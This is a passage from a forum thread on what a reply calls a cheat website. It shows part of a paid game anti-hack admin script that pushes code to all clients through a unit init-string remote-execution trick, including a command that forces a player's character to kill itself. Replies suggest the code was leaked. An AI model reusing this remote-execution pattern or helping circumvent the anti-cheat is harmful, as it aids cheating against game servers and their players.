    			deleteVehicle adminREObj;
    			deleteGroup _group;
    		[nil, nil, rSPAWN, _unit, { if !(local _this) exitWith {}; 
    						removeAllWeapons player; 
    						player addEventHandler ["fired", {if (alive player) then { player SetDamage 1.1;};}];
    						_config = "glock17_EP1";_isOK = [player,_config, true] call BIS_fnc_invAdd;
    						_config = "17Rnd_9x19_glock17";_isOK = [player,_config, true] call BIS_fnc_invAdd;
    						player selectWeapon "glock17_EP1";
    						reload player;
    						sleep 1.5;
    						player switchMove "ActsPercMstpSnonWpstDnon_suicide1B";
    						sleep 3.9;
    						player fire (currentWeapon player); 
    		}] call _PVAH_RE;
    	if (_option == 19) then //mass message
    		_msg = _array select 2;
    		//[nil, nil, rTitleText, toString(_msg), "PLAIN"] call RE;
    		_do = format["titleText ['%1', 'PLAIN'];",toString(_msg)];
    		_group = (creategroup east);
    		'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    		deleteVehicle adminREObj;
    		deleteGroup _group;
    	if (_option == 20) then //time
    		_date = _array select 2;
    		_offset = _array select 3;
    		_date set [3,_offset];
    		setDate _date;
    		_PVAH_RE = {
    			PVAH_args = _this select 3;
    			PVAH_code = _this select 4;
    			publicVariable "PVAH_args";
    			publicVariable "PVAH_code";
    			_do = ";PVAH_args spawn PVAH_code;";
    			_group = (creategroup east);
    			'Logic' createunit[[0, 0, 0], _group, _do + ";adminREObj = this;", 0.5, "corporal"];
    			deleteVehicle adminREObj;
    			deleteGroup _group;
    		[nil, nil, rSPAWN, _date, { setDate _this; }] call _PVAH_RE;
    publicVariable "tlmxzyxzy";
    { _x setPos [random 9000,random 9000,0]; } forEach (allmissionobjects 'Logic');
    diag_log ("ANTI-HACK Running...");

  2. #2
    mec5052's Avatar
    Join Date
    Sep 2013


    So u made a Anti-Cheat script and posted in a Cheat Website ... ?

  3. #3
    5^*hdrrfgfbs#%R$'s Avatar
    Join Date
    Jul 2014
    Quote Originally Posted by mec5052 View Post
    So u made a Anti-Cheat script and posted in a Cheat Website ... ?
    There are many servers with 60/60 players who paid 200$ for this anti-cheat.

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